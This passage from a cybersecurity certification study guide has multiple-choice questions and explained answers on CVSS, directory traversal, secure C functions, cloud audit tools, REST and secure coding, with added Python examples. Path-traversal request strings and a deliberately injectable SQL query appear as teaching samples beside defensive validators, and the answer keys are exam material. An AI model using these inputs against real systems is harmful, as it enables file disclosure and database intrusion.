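    print("open:", open_services(HPING_OUTPUT))
```

Note that seven replies were received for seven probes, so nothing here was filtered; a silently dropped probe would simply be missing from the dictionary, which is worth checking against the number of probes sent.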

Question 12. The Internet of Things (IoT) is a network of physical objects that are embedded with sensors, software and other technologies for the purpose of connecting and exchanging data with other devices and systems over the Internet. Which of the following is NOT considered an IoT threat or vulnerability?
(A) Insecure network services
(B) Lack of secure update mechanism
(C) Lack of physical hardening
(D) Unoptimized software code

Explanation 12. Unoptimized software code is the correct answer. Inefficient code is a performance and quality problem, not a security weakness in itself, and it does not appear in the OWASP Internet of Things Top 10 (2018), which lists:

1. Weak, guessable, and hardcoded passwords
2. Insecure network services
3. Insecure ecosystem interfaces
4. Lack of secure update mechanism
5. Use of insecure or outdated components
6. Insufficient privacy protection
7. Insecure data transfer and storage
8. Lack of device management
9. Insecure default settings
10. Lack of physical hardening

Question 13. A telecom company may promise network avail-
ability of 99.999 percent and allow the customer to reduce
their payment by a given percentage if that is not achieved.
Which of the following agreements is described in this exam-
ple?
(A) Memorandum of understanding
(B) Service-level agreement
(C) Organizational governance
(D) Business process interruption

Explanation 13. Service-level agreement is the correct answer. A service-level agreement (SLA) defines the level of service expected by a customer from a supplier, laying out the metrics by which that service is measured and the remedies or penalties, if any, should the agreed-on service levels not be achieved. Usually SLAs are between companies and external suppliers, but they may also be between two departments within a company. A memorandum of understanding, by contrast, records a shared intent between parties and normally carries no penalties.

Question 14. A developer at your company is writing software in C. As a junior software engineer he needs your help choosing secure functions for his projects. Which of the following functions should he avoid because it is considered insecure?
(A) strcpy()
(B) strncpy()
(C) strlen()
(D) strlwr()

Explanation 14. strcpy() is the correct answer. strcpy() copies bytes until it reaches the terminating NUL of the source and never checks the size of the destination array, so a buffer overrun is always a risk: if the destination is not large enough to hold the source string, the behaviour is undefined, and an attacker who controls the source can overwrite adjacent memory. Even when the string is expected to fit, nothing in the call enforces it. strncpy() takes an explicit length bound, which is why it is the preferred choice here, but it has its own pitfall: if the source is at least as long as the bound, no terminating NUL is written, so the caller must reserve a byte for it and terminate the buffer explicitly (snprintf() or, where available, strlcpy() avoid this). strlen() only reads its argument, and strlwr() rewrites a string in place without changing its length, so neither can overrun a correctly sized buffer.

Question 15. While interpreting assessment reports from the Acunetix vulnerability scanner you identified a vulnerability whose Common Vulnerability Scoring System (CVSS) vector has an access vector value of Local (L), which carries a weight of 0.395. Based on the given scenario, which of the following statements would be true?
(A) There is no impact on the availability of the system
(B) The attacker must either have physical access to the vulnerable system or a local account
(C) The attacker must authenticate once in order to exploit the vulnerability
(D) There is no impact on the confidentiality of the system

Explanation 15. The attacker must either have physical access to the vulnerable system or a local account is the correct answer. The CVSS assessment measures three areas of concern:

1. Base metrics for qualities intrinsic to a vulnerability
2. Temporal metrics for characteristics that evolve over the lifetime of the vulnerability
3. Environmental metrics for vulnerabilities that depend on a particular implementation or environment

A numerical score is generated for each of these metric groups. A vector string (or simply "vector" in CVSSv2) represents the values of all the metrics as a block of text, for example AV:L/AC:L/Au:N/C:P/I:P/A:P. The access vector only says where the attacker must be; it says nothing about authentication (that is the Au metric) or about the impact on confidentiality or availability (the C and A metrics), which is why the other options cannot be inferred from AV:L alone. The weights below belong to CVSS v2; CVSS v3 renamed the metric Attack Vector, added a Physical value and uses different weights.

The access vector (AV) shows how the vulnerability may be exploited.

    Value                 Description                                               Score
    Local (L)             The attacker must either have physical access to the      0.395
                          vulnerable system (e.g. FireWire attacks) or a local
                          account (e.g. a privilege escalation attack).
    Adjacent Network (A)  The attacker must have access to the broadcast or         0.646
                          collision domain of the vulnerable system (e.g. ARP
                          spoofing, Bluetooth attacks).
    Network (N)           The vulnerable interface is working at layer 3 or above   1.0
                          of the OSI network stack. These vulnerabilities are
                          often described as remotely exploitable (e.g. a remote
                          buffer overflow in a network service).

Question 16. Your company uses a web vulnerability scanner named Acunetix to check whether your website and web applications are vulnerable. While reviewing a scan report you saw the following request:

    http://test.webarticles.com/show.asp?view=../../../../../Windows/system.ini HTTP/1.1

What type of attack is conducted on that website?
(A) Password spraying
(B) Directory traversal
(C) Privilege escalation
(D) On-path attack

Explanation 16. Directory traversal is the correct answer. Directory traversal (or path traversal) is an HTTP attack in which the attacker supplies "../" sequences in a file-name parameter so that the application reads, and in some cases writes or executes, files and directories outside the web server's document root. In the request above, the view parameter climbs five directory levels above the web root and asks the server to return Windows/system.ini, a file the application was never meant to serve. Percent-encoded variants (%2e%2e%2f) and backslashes on Windows servers are common ways of evading naive filters.
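As an added Python example (not from the book or the scanner vendor), here is the check a hardened show.asp handler should make before opening the file named in view, and the same check run over a handful of constructed request URLs in the shape seen in the report. The document root is a hypothetical path.

```python
import posixpath
from urllib.parse import parse_qs, unquote, urlsplit

# Hypothetical document root of the vulnerable application.
WEB_ROOT = "/var/www/webarticles"

# Constructed sample requests in the shape reported by the scanner.
SAMPLE_REQUESTS = [
    "http://test.webarticles.com/show.asp?view=oldarchive.html",
    "http://test.webarticles.com/show.asp?view=../../../../../Windows/system.ini",
    "http://test.webarticles.com/show.asp?view=..%252F..%252F..%252Fetc%252Fpasswd",
    "http://test.webarticles.com/show.asp?view=news/../news/today.html",
]


def resolve_under_root(requested, root=WEB_ROOT):
    """Return the absolute path for a user-supplied file name, or raise
    ValueError when it would land outside the document root."""
    if "\x00" in requested:
        raise ValueError("NUL byte in path")
    # Decode percent-encoding twice (catches %252e double encoding) and treat
    # backslashes as separators, as an IIS/Windows host would.
    cleaned = unquote(unquote(requested)).replace("\\", "/")
    root = posixpath.normpath(root)
    # normpath collapses every "../"; an absolute 'cleaned' replaces root entirely,
    # so both escapes show up as a candidate that no longer starts with root.
    candidate = posixpath.normpath(posixpath.join(root, cleaned))
    if candidate != root and not candidate.startswith(root + "/"):
        raise ValueError(f"path escapes document root: {requested!r}")
    return candidate


def is_safe_view(requested, root=WEB_ROOT):
    """True when the requested file resolves inside the document root."""
    try:
        resolve_under_root(requested, root)
        return True
    except ValueError:
        return False


def traversal_attempts(urls, root=WEB_ROOT):
    """URLs whose 'view' parameter would escape the web root: the same check,
    run over scanner output or access-log entries."""
    flagged = []
    for url in urls:
        # parse_qs already percent-decodes once; the resolver decodes again.
        for value in parse_qs(urlsplit(url).query).get("view", []):
            if not is_safe_view(value, root):
                flagged.append(url)
                break
    return flagged


if __name__ == "__main__":
    for url in SAMPLE_REQUESTS:
        view = parse_qs(urlsplit(url).query)["view"][0]
        print(f"{'ATTACK' if not is_safe_view(view) else 'ok    '}  {url}")
```

The fourth sample contains "../" yet is accepted, because it normalizes to a path inside the root; matching on the literal string "../" would produce both false positives like this one and false negatives for the encoded forms.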

Password spraying is incorrect. Password spraying is a variant of a brute force attack. In a traditional brute force attack, the perpetrator attempts to gain unauthorized access to a single account by guessing the password repeatedly in a very short period of time. In a password spraying attack, the attacker circumvents common countermeasures such as account lockout by "spraying" the same password across many accounts before trying another password.

Privilege escalation is incorrect. Privilege escalation attacks exploit weaknesses and security vulnerabilities with the goal of elevating access to a network, applications and mission-critical systems. There are two types, vertical and horizontal. In a vertical attack the attacker starts from an account with limited permissions and escalates to a higher level of privilege, such as an administrator role, to perform the desired actions. In a horizontal attack the attacker gains access to another account at the same privilege level with the intent to perform actions as that user. Reading system.ini through the web server is information disclosure, not a change of privilege.

On-path attack is incorrect. On-path attackers place themselves between two devices (often a web browser and a web server) and intercept or modify communications between the two. The attackers can then collect information as well as impersonate either of the two parties. In addition to websites, these attacks can target email communications, DNS lookups and public Wi-Fi networks.

Question 17. An organization has hired a cybersecurity analyst to conduct an assessment of its current wireless network security. He has been tasked to capture the inbound and outbound packets and export the data to text files for further processing by third-party tools. Which of the following tools should the analyst use to complete the task?
(A) ScoutSuite
(B) Pacu
(C) Prowler
(D) Aircrack-ng

Explanation 17. Aircrack-ng is the correct answer. Aircrack-ng is a complete suite of tools to assess Wi-Fi network security. It focuses on different areas of Wi-Fi security:

- Monitoring: packet capture and export of data to text files for further processing by third-party tools
- Attacking: replay attacks, de-authentication, fake access points and others via packet injection
- Testing: checking Wi-Fi cards and driver capabilities (capture and injection)
- Cracking: WEP and WPA PSK (WPA 1 and 2)

The other options are incorrect because they are cloud infrastructure assessment tools: ScoutSuite and Prowler audit cloud account configuration, and Pacu is an AWS exploitation framework.

Question 18. You have been hired as a cybersecurity analyst to conduct an assessment against the organization's network. You are now in the process of trying to discover as many attack vectors as possible that can be used to exploit the systems further. Which of the following is the phase you are currently in?
(A) Static analysis
(B) Reverse engineering
(C) Enumeration
(D) Dynamic analysis

Explanation 18. Enumeration is the correct answer. Enumeration belongs to the first phase of ethical hacking, known as information gathering. It is the process in which the attacker establishes an active connection with the target (for example, querying open ports, shares, user lists and service banners) and tries to discover as many attack vectors as possible that can be used to exploit the systems further.

The other options are incorrect because static analysis, dynamic analysis and reverse engineering are software assessment techniques applied to a particular program, not a phase of a network assessment.

Question 19. Your company has moved its workloads from its on-premises environment to Amazon Web Services (AWS) to benefit from substantial IT cost savings, business agility and operational resilience. You have been tasked to recommend a tool that enables security posture assessment of cloud environments. Which of the following tools should you recommend to complete the task?
(A) Scout Suite
(B) Aircrack-ng
(C) oclHashcat
(D) Reaver

Explanation 19. Scout Suite is the correct answer. Scout Suite is an open-source multi-cloud security-auditing tool that enables security posture assessment of cloud environments. Using the APIs exposed by cloud providers, Scout Suite gathers configuration data for manual inspection and highlights risk areas. Rather than going through dozens of pages on the web consoles, Scout Suite presents a clear view of the attack surface automatically.

Cloud provider support. The following cloud providers are currently supported:
- Amazon Web Services
- Microsoft Azure
- Google Cloud Platform
- Alibaba Cloud (alpha)
- Oracle Cloud Infrastructure (alpha)

The other options are incorrect because none of them assesses cloud configuration: Aircrack-ng and Reaver are wireless assessment tools, and oclHashcat (now part of Hashcat) is a GPU password-hash cracker.

Question 20. You are working on an application with multiple serverless functions and your task is to deploy a REST API using Serverless, Express and Node.js. Which of the following actions should you perform to ensure that a vulnerability in one function doesn't escalate and compromise others as well?
(A) Maintain isolated function perimeters
(B) Employ API gateways as a security buffer
(C) Secure and verify data in transit
(D) Patch function dependencies

Explanation 20. Maintain isolated function perimeters is the correct answer. Treat every function as its own security perimeter to ensure that a compromise in one function doesn't escalate to other functions and resources:
1. Do not rely on function access and invocation ordering
2. Sanitize function input and treat event data as untrusted
3. Adopt, mandate and re-use security libraries across your functions
In practice this also means giving each function its own least-privilege execution role rather than one role shared by the whole API.
CHAPTER 2
SOFTWARE AND SYSTEMS
SECURITY

Questions 21-35

Question 21. A company is planning to increase the security of its private network by adding a new security device between the public network and its private network. The device will be used as a proxy server and will be responsible for routing the traffic between the two networks. Which of the following devices should be installed to isolate access to the internal network?
(A) IDS
(B) IPS
(C) Jumpbox
(D) Virtual private network

Question 22. Your company's development team has just released a new social media app. The team's next task is to measure the robustness of the new app under extremely heavy load conditions to ensure that the app doesn't crash in crunch situations. Which of the following software assessment actions do they need to perform to complete the task?
(A) Stress test application
(B) Security regression testing
(C) User acceptance testing
(D) Code review

Question 23. A cybersecurity researcher is debugging code by examining how the application behaves during and after execution. Which of the following code analysis methods is the researcher currently performing?
(A) Static code analysis
(B) Dynamic code analysis
(C) Stress test application
(D) DevSecOps

Question 24. A cybersecurity researcher is debugging code by examining the source code of the application before execution. Which of the following code analysis methods is the researcher currently performing?
(A) Static code analysis
(B) Dynamic code analysis
(C) Stress test application
(D) DevSecOps

Question 25. A developer is building a new CRUD application for a university. A path such as university.com/students/2/course/6 accesses the course with id 6 for the student with id 2. This is an example of which service-oriented architecture?
(A) Security Assertions Markup Language
(B) Simple Object Access Protocol
(C) Representational State Transfer
(D) Microservices

Question 26. A self-encrypting drive is a type of hard drive that automatically and continuously encrypts the data on the drive without any user interaction. (TRUE/FALSE)
(A) TRUE
(B) FALSE

Question 27. As a cybersecurity analyst, you need to find a way to lure attackers into attacking networks that look like legitimate targets, with the aim of tracking their behavior and collecting clues that will help you make the real network more secure. Which of the following approaches describes this scenario?
(A) Virtual desktop infrastructure
(B) Honeypot
(C) Virtual private cloud
(D) Software-defined networking

Question 28. Which of the following hardware root of trust terms is a chip that stores RSA encryption keys specific to the host system for hardware authentication?
(A) Hardware security module
(B) Trusted Platform Module
(C) Trusted execution
(D) Processor security extensions

Question 29. Students at examsdigest.com log in using their username and password. As this method has security issues, the ExamsDigest team is looking for a way to increase the security of the login system by requiring students to provide more evidence to prove their identity. Which of the following authentication methods does ExamsDigest need to implement?
(A) Privilege management
(B) Single sign-on
(C) Multifactor authentication
(D) Active defense

Question 30. You are implementing an active defense strategy for your organization. Which of the following actions should you perform to outmaneuver an adversary and make an attack more difficult to carry out?
(A) Intrusion detection system implementation
(B) Honeypot implementation
(C) Intrusion prevention system implementation
(D) Access control list implementation

Question 31. Your company's developer just released a new version of the registration form on the web application. Now the username field accepts only letters, and the password field accepts special characters and numbers. This is an example of which secure coding best practice?
(A) Output encoding
(B) Input validation
(C) Session management
(D) Parameterized queries

Question 32. Mike's organization uses a hybrid approach for its infrastructure: they keep an on-premises environment for some services but also use Amazon Web Services for others. Which of the following software tools do they need to ensure that network traffic between on-premises devices and the cloud provider complies with the organization's security policies?
(A) Virtual desktop infrastructure
(B) Cloud access security broker
(C) Simple Object Access Protocol
(D) Representational State Transfer

Question 33. The process of replacing HTML control characters (e.g. <, >, ", &) with their encoded equivalents (e.g. &lt; &gt; &quot; &amp;) is known as?
(A) Input validation
(B) Session management
(C) Output encoding
(D) Parameterized queries

Question 34. A web developer wants to protect a web application from session hijacking attacks. Which of the following actions should the web developer perform to prevent an attacker from exploiting valid sessions? (Choose all that apply.)
(A) Use of a short random number or string as the session key
(B) Encryption of the data traffic passed between the parties by using SSL/TLS
(C) Use of a long random number or string as the session key
(D) Regenerating the session id after a successful login
(E) Regenerating the session id after a successful logout

Question 35. Which of the following are the tactics of the En-
terprise ATT&CK framework? (Choose all that apply.)
(A) Privilege Escalation
(B) Defense Evasion
(C) Credential Access
(D) Lateral Movement
(E) Anti-tamper

Answers 21-35

Question 21. A company is planning to increase the security of its private network by adding a new security device between the public network and its private network. The device will be used as a proxy server and will be responsible for routing the traffic between the two networks. Which of the following devices should be installed to isolate access to the internal network?
(A) IDS
(B) IPS
(C) Jumpbox
(D) Virtual private network

Explanation 21. Jumpbox is the correct answer. A jump box functions as a proxy server and is a way to isolate access to a private network. It is usually a computer that is connected to two networks and has two network cards. One network card is configured with an external IP address that is accessible from the Internet. The second network card provides an internal IP address that is only accessible to computers on the internal network. The jump box is then configured to correctly route traffic between the two networks. Because it is the single path into the private network, the jump box itself must be hardened, require strong (ideally multifactor) authentication and log every session.

IDS is incorrect. An intrusion detection system (IDS) is a device or software application that monitors a network for malicious activity or policy violations; it alerts but does not sit in the traffic path.

IPS is incorrect. An intrusion prevention system (IPS) is a form of network security that works to detect and prevent identified threats. Intrusion prevention systems continuously monitor your network, looking for possible malicious incidents and capturing information about them.

Virtual private network is incorrect. A virtual private network, or VPN, is an encrypted connection over the Internet from a device to a network. The encrypted connection helps ensure that sensitive data is safely transmitted.

Question 22. Your company's development team has just released a new social media app. The team's next task is to measure the robustness of the new app under extremely heavy load conditions to ensure that the app doesn't crash in crunch situations. Which of the following software assessment actions do they need to perform to complete the task?
(A) Stress test application
(B) Security regression testing
(C) User acceptance testing
(D) Code review

Explanation 22. Stress test application is the correct answer. Stress testing is a type of software testing that verifies the stability and reliability of software applications. The goal of stress testing is to measure the software's robustness and error-handling capabilities under extremely heavy load conditions and to ensure that it doesn't crash in crunch situations. It tests beyond normal operating points and evaluates how the software works under extreme conditions.

Question 23. A cybersecurity researcher is debugging code by examining how the application behaves during and after execution. Which of the following code analysis methods is the researcher currently performing?
(A) Static code analysis
(B) Dynamic code analysis
(C) Stress test application
(D) DevSecOps

Explanation 23. Dynamic code analysis is the correct answer. Dynamic code analysis is the method of debugging by examining an application while or after it runs, for example with a debugger, a fuzzer or an instrumented test run.

Static code analysis is incorrect. Static code analysis is a method of debugging by examining an application's source code before it is run.

Stress test application is incorrect. Stress testing is a type of software testing that verifies the stability and reliability of software applications. The goal of stress testing is to measure the software's robustness and error-handling capabilities under extremely heavy load conditions and to ensure that it doesn't crash in crunch situations. It tests beyond normal operating points and evaluates how the software works under extreme conditions.

DevSecOps is incorrect. DevSecOps is the philosophy of integrating security practices within the DevOps process. DevSecOps involves creating a "security as code" culture with ongoing, flexible collaboration between release engineers and security teams. The DevSecOps movement, like DevOps itself, is focused on creating new solutions for complex software development processes within an agile framework.

Question 24. A cybersecurity researcher is debugging code by examining the source code of the application before execution. Which of the following code analysis methods is the researcher currently performing?
(A) Static code analysis
(B) Dynamic code analysis
(C) Stress test application
(D) DevSecOps

Explanation 24. Static code analysis is the correct answer. Static code analysis is a method of debugging by examining an application's source code before it is run.

Dynamic code analysis is incorrect. Dynamic code analysis is the method of debugging by examining an application while or after it runs.

Stress test application is incorrect. Stress testing is a type of software testing that verifies the stability and reliability of software applications. The goal of stress testing is to measure the software's robustness and error-handling capabilities under extremely heavy load conditions and to ensure that it doesn't crash in crunch situations. It tests beyond normal operating points and evaluates how the software works under extreme conditions.

DevSecOps is incorrect. DevSecOps is the philosophy of integrating security practices within the DevOps process. DevSecOps involves creating a "security as code" culture with ongoing, flexible collaboration between release engineers and security teams. The DevSecOps movement, like DevOps itself, is focused on creating new solutions for complex software development processes within an agile framework.

Question 25. A developer is building a new CRUD application


for a university. The path like university.com/students/
2/course/6 accessing the course with id 6 for the student
with id 2. This is an example of which service-oriented archi-
tecture?
(A) Security Assertions Markup Language
(B) Simple Object Access Protocol
(C) Representational State Transfer
(D) Microservices

Explanation 25. Representational State Transfer is the correct answer. REST, or REpresentational State Transfer, is an architectural style for providing standards between computer systems on the web, making it easier for systems to communicate with each other.

There are 4 basic HTTP verbs we use in requests to interact with resources in a REST system:
GET — retrieve a specific resource (by id) or a collection of resources
POST — create a new resource
PUT — update a specific resource (by id)
DELETE — remove a specific resource (by id)

Let’s say we have an application that allows you to view, create, edit, and delete customers and orders for a small clothing store hosted at fashionboutique.com. We could create an HTTP API that allows a client to perform these functions. If we wanted to view all customers, the request would look like this:
GET http://fashionboutique.com/customers
Accept: application/json
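The following is an added example, not code from the book: a minimal REST-style router for the university CRUD application of Question 25. It maps the four verbs above plus a path such as /students/2/course/6 onto an in-memory store. The store, the one sample course record and all function names are constructed for this example; ids are accepted only as decimal digits, so a malformed segment such as "../6" or "abc" never reaches the store and just yields 404.

```python
"""Minimal REST-style resource router (added example, not from the book).

Maps an HTTP verb plus a path such as /students/2/course/6 onto an
in-memory store, the way the university CRUD application in Question 25
would expose course records. The store and its one row are constructed.
"""
import re
from typing import Any, Dict, Optional, Tuple

# Collection: /students/<id>/course        Item: /students/<id>/course/<id>
COLLECTION_RE = re.compile(r"^/students/(\d+)/course$")
ITEM_RE = re.compile(r"^/students/(\d+)/course/(\d+)$")

# student id -> {course id -> course record}; one constructed row
STORE: Dict[int, Dict[int, Dict[str, Any]]] = {
    2: {6: {"title": "Network Security", "credits": 4}},
}

Response = Tuple[int, Any]   # (HTTP status code, response body or None)


def handle(verb: str, path: str, body: Optional[Dict[str, Any]] = None) -> Response:
    """Dispatch one request the way a REST resource handler would.

    Ids are matched as decimal digits only, so path segments such as
    '../6' or 'abc' do not match either template and produce 404.
    """
    coll = COLLECTION_RE.match(path)
    if coll:
        courses = STORE.setdefault(int(coll.group(1)), {})
        if verb == "GET":
            # GET on the collection: list every resource, id included
            return 200, [{"id": cid, **rec} for cid, rec in sorted(courses.items())]
        if verb == "POST":
            # POST creates a new resource; the server assigns the id
            new_id = max(courses, default=0) + 1
            courses[new_id] = dict(body or {})
            return 201, {"id": new_id, **courses[new_id]}
        return 405, None  # verb not allowed on the collection

    item = ITEM_RE.match(path)
    if item:
        student_id, course_id = int(item.group(1)), int(item.group(2))
        courses = STORE.get(student_id, {})
        if verb == "GET":
            rec = courses.get(course_id)
            return (200, rec) if rec is not None else (404, None)
        if verb == "PUT":
            # PUT replaces an existing resource; it does not create one
            if course_id not in courses:
                return 404, None
            courses[course_id] = dict(body or {})
            return 200, courses[course_id]
        if verb == "DELETE":
            return (204, None) if courses.pop(course_id, None) is not None else (404, None)
        return 405, None  # e.g. PATCH is not one of the four verbs here

    return 404, None  # path matches no resource template
```

Note that POST goes to the collection path, not to a specific id, which is how a server keeps control of id assignment; PUT and DELETE address one resource by id, exactly as the verb list above describes.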

Question 26. A Self-Encrypting Drive is a type of hard drive that automatically and continuously encrypts the data on the drive without any user interaction. (TRUE/FALSE)
(A) TRUE
(B) FALSE

Explanation 26. The correct answer is TRUE. A SED (or Self-Encrypting Drive) is a type of hard drive that automatically and continuously encrypts the data on the drive without any user interaction. This encryption process is done through the use of a unique and random Data Encryption Key (DEK) which the drive uses to both encrypt and decrypt the data.

Whenever data is written to the drive, it first gets encrypted according to the DEK. Similarly, whenever data is read from the drive, it first gets decrypted by the same DEK before being sent to the rest of the system.

Question 27. As a cybersecurity analyst, you need to find a way to fool attackers into attacking networks that look like legitimate targets, with the aim of tracking their behavior and collecting clues that will help you make the real network more secure. Which of the following approaches describes this scenario?
(A) Virtual desktop infrastructure
(B) Honeypot
(C) Virtual private cloud
(D) Software-defined networking

Explanation 27. Honeypot is the correct answer. The honeypot looks like a real computer system, with applications and data, fooling cybercriminals into thinking it’s a legitimate target. For example, a honeypot could mimic a company’s customer billing system – a frequent target of attack for criminals who want to find credit card numbers. Once the hackers are in, they can be tracked, and their behavior assessed for clues on how to make the real network more secure.

Virtual desktop infrastructure is incorrect. Virtual desktop infrastructure (VDI) is a technology that refers to the use of virtual machines to provide and manage virtual desktops. VDI hosts desktop environments on a centralized server and deploys them to end-users on request.

Virtual private cloud is incorrect. A virtual private cloud (VPC) is a secure, isolated private cloud hosted within a public cloud. VPC customers can run code, store data, host websites, and do anything else they could do in an ordinary private cloud, but the private cloud is hosted remotely by a public cloud provider.

Software-defined networking is incorrect. Software-defined networking (SDN) is an architecture designed to make a network more flexible and easier to manage. SDN centralizes management by abstracting the control plane from the data forwarding function in the discrete networking devices.

Question 28. Which of the following hardware root of trust terms is a chip that stores RSA encryption keys specific to the host system for hardware authentication?
(A) Hardware security module
(B) Trusted Platform Module
(C) Trusted execution
(D) Processor security extensions

Explanation 28. Trusted Platform Module is the correct answer. Trusted Platform Module (TPM) technology is designed to provide hardware-based, security-related functions. A TPM chip is a secure crypto-processor that is designed to carry out cryptographic operations.

The chip includes multiple physical security mechanisms to make it tamper-resistant, and malicious software is unable to tamper with the security functions of the TPM. A Trusted Platform Module (TPM) is a specialized chip on an endpoint device that stores RSA encryption keys specific to the host system for hardware authentication.

Some of the key advantages of using TPM technology are that you can:
- Generate, store, and limit the use of cryptographic keys.
- Use TPM technology for platform device authentication by using the TPM’s unique RSA key, which is burned into itself.
- Help ensure platform integrity by taking and storing security measurements.

Question 29. Students at examsdigest.com log in using their username and password. As this method has security issues, ExamsDigest's team is looking for solutions to increase the security of the login system by requiring students to provide more evidence to prove their identity. Which of the following authentication methods does ExamsDigest need to implement?
(A) Privilege management
(B) Single sign-on
(C) Multifactor authentication
(D) Active defense

Explanation 29. Multifactor authentication is the correct answer. Multi-factor authentication (MFA) is used to ensure that digital users are who they say they are by requiring that they provide at least two pieces of evidence to prove their identity. Each piece of evidence must come from a different category: something they know, something they have or something they are.

If one of the factors has been compromised by a hacker or unauthorized user, the chances of another factor also being compromised are low, so requiring multiple authentication factors provides a higher level of assurance about the user’s identity.

Question 30. You are implementing an active defense strategy for your organization. Which of the following actions should you perform to outmaneuver an adversary and make an attack more difficult to carry out?
(A) Intrusion detection system implementation
(B) Honeypot defense implementation
(C) Intrusion prevention system implementation
(D) Access control list implementation

Explanation 30. Honeypot implementation is the correct answer. An active defense is the use of offensive actions to outmaneuver an adversary and make an attack more difficult to carry out. Slowing down or derailing the attacker so they cannot advance or complete their attack increases the probability that they will make a mistake and expose their presence or reveal their attack vector.

An active defense technique is to implement honeypots to track the behavior of attackers and collect clues that will help you make the real network more secure.

Question 31. The developer at your company just released a new version of the registration form on the web application. Now the username field should contain only alphabetic characters, and the password field accepts special characters and numbers. This is an example of which secure coding best practice?
(A) Output encoding
(B) Input validation
(C) Session management
(D) Parameterized queries

Explanation 31. Input validation is the correct answer. Input validation is performed to ensure only properly formed data is entering the workflow in an information system, preventing malformed data from persisting in the database and triggering malfunction of various downstream components. Input validation should happen as early as possible in the data flow, preferably as soon as the data is received from the external party.

Output encoding is incorrect. Output encoding is the process of replacing HTML control characters (e.g. <, >, “, &, etc.) with their encoded representations. This is the best mitigation against cross-site scripting attacks.

Session management is incorrect. Session management refers to the process of securely handling multiple requests to a web-based application or service from a single user or entity. Websites and browsers use HTTP to communicate, and a session is a series of HTTP requests and transactions initiated by the same user.

Parameterized queries is incorrect. A parameterized query is a type of SQL query that requires at least one parameter for execution. One major reason for using parameterized queries is that they make queries more readable. The second and most compelling reason is that parameterized queries help to protect the database from SQL injection attacks.

Question 32. Mike’s organization uses a hybrid approach for its infrastructure: it has an on-premises environment for some of its services but also uses Amazon Web Services for other services. Which of the following software tools do they need to ensure that network traffic between on-premises devices and the cloud provider complies with the organization’s security policies?
(A) Virtual desktop infrastructure
(B) Cloud access security broker
(C) Simple Object Access Protocol
(D) Representational State Transfer

Explanation 32. Cloud access security broker is the correct answer. A cloud access security broker (CASB) is a software tool or service that sits between an organization's on-premises infrastructure and a cloud provider's infrastructure. A CASB acts as a gatekeeper, allowing the organization to extend the reach of their security policies beyond their own infrastructure.

CASBs work by ensuring that network traffic between on-premises devices and the cloud provider complies with the organization's security policies. The value of cloud access security brokers stems from their ability to give insight into cloud application use across cloud platforms and identify unsanctioned use. This is especially important in regulated industries.

Virtual desktop infrastructure is incorrect. Virtual desktop infrastructure (VDI) is a technology that refers to the use of virtual machines to provide and manage virtual desktops. VDI hosts desktop environments on a centralized server and deploys them to end-users on request.

Simple Object Access Protocol is incorrect. Simple Object Access Protocol (SOAP) is a message protocol that allows distributed elements of an application to communicate. SOAP can be carried over a variety of lower-level protocols, including the web-related Hypertext Transfer Protocol (HTTP).

Representational state transfer is incorrect. Representational state transfer (REST) is a type of software architecture that was designed to ensure interoperability between different Internet computer systems.

REST works by putting in place very strict constraints for the development of web services. Services that conform to the REST architecture can more easily communicate with one another.

Question 33. The process of replacing HTML control characters (e.g. <, >, “, &, etc.) with their encoded representations (e.g. “&lt;” “&gt;” “&quot;” “&amp;” etc.) is known as?
(A) Input validation
(B) Session management
(C) Output encoding
(D) Parameterized queries

Explanation 33. Output encoding is the correct answer. Output encoding is the process of replacing HTML control characters (e.g. <, >, “, &, etc.) with their encoded representations. This is the best mitigation against cross-site scripting attacks.

Input validation is incorrect. Input validation is performed to ensure only properly formed data is entering the workflow in an information system, preventing malformed data from persisting in the database and triggering malfunction of various downstream components. Input validation should happen as early as possible in the data flow, preferably as soon as the data is received from the external party.

Session management is incorrect. Session management refers to the process of securely handling multiple requests to a web-based application or service from a single user or entity. Websites and browsers use HTTP to communicate, and a session is a series of HTTP requests and transactions initiated by the same user.

Parameterized queries is incorrect. A parameterized query is a type of SQL query that requires at least one parameter for execution. One major reason for using parameterized queries is that they make queries more readable. The second and most compelling reason is that parameterized queries help to protect the database from SQL injection attacks.
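The three practices discussed in Questions 31 and 33 (input validation, output encoding and parameterized queries) are shown side by side below as an added example; this is not code from the book. The registration-form rules of Question 31 are applied (username: letters only; password: digits and special characters allowed, with a length floor), the HTML entity replacement of Question 33 is done with Python's standard `html.escape`, and the string-concatenated query is kept next to its parameterized form so the difference under a crafted input is visible. The SQLite table, its two rows and all function names are constructed for this example.

```python
"""Input validation, output encoding and parameterized queries (added
example, not from the book). The users table and its rows are constructed."""
import html
import re
import sqlite3
from typing import List

USERNAME_RE = re.compile(r"^[A-Za-z]{3,32}$")   # allow-list: letters only
PASSWORD_MIN = 12


def validate_username(value: str) -> bool:
    """Allow-list check: only ASCII letters, 3 to 32 of them, nothing else."""
    return bool(USERNAME_RE.fullmatch(value))


def validate_password(value: str) -> bool:
    """Digits and special characters are fine; enforce a length floor and
    reject control characters, which have no place in a password field."""
    if len(value) < PASSWORD_MIN:
        return False
    return all(ch.isprintable() for ch in value)


def encode_output(value: str) -> str:
    """Replace HTML control characters with their entity forms before the
    value is placed into a page, so stored markup renders as plain text."""
    return html.escape(value, quote=True)   # < > & " ' -> &lt; &gt; &amp; &quot; &#x27;


def setup_db() -> sqlite3.Connection:
    """In-memory database with two constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT UNIQUE, display_name TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, display_name) VALUES (?, ?)",
        [("alice", "Alice"), ("bob", "<b>Bob</b> & co")],
    )
    return conn


def find_user_unsafe(conn: sqlite3.Connection, username: str) -> List[str]:
    """The 'before' form: the input is spliced into the SQL text, so
    a value containing quotes changes the meaning of the query."""
    sql = "SELECT username FROM users WHERE username = '" + username + "'"
    return [row[0] for row in conn.execute(sql).fetchall()]


def find_user(conn: sqlite3.Connection, username: str) -> List[str]:
    """Parameterized form: the value is bound to '?', never parsed as SQL."""
    rows = conn.execute("SELECT username FROM users WHERE username = ?", (username,))
    return [row[0] for row in rows.fetchall()]


def render_display_name(conn: sqlite3.Connection, username: str) -> str:
    """Full defensive path: validate on input, bind the parameter,
    encode on output. Returns the HTML-safe display name or ''."""
    if not validate_username(username):
        return ""
    row = conn.execute(
        "SELECT display_name FROM users WHERE username = ?", (username,)
    ).fetchone()
    return encode_output(row[0]) if row else ""
```

Run against the same crafted value, `find_user_unsafe` returns every row while `find_user` returns none, which is the whole argument for parameterized queries; `render_display_name` shows that validation rejects the value even earlier, and that a display name containing markup is neutralised at output time rather than being stripped on the way in.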

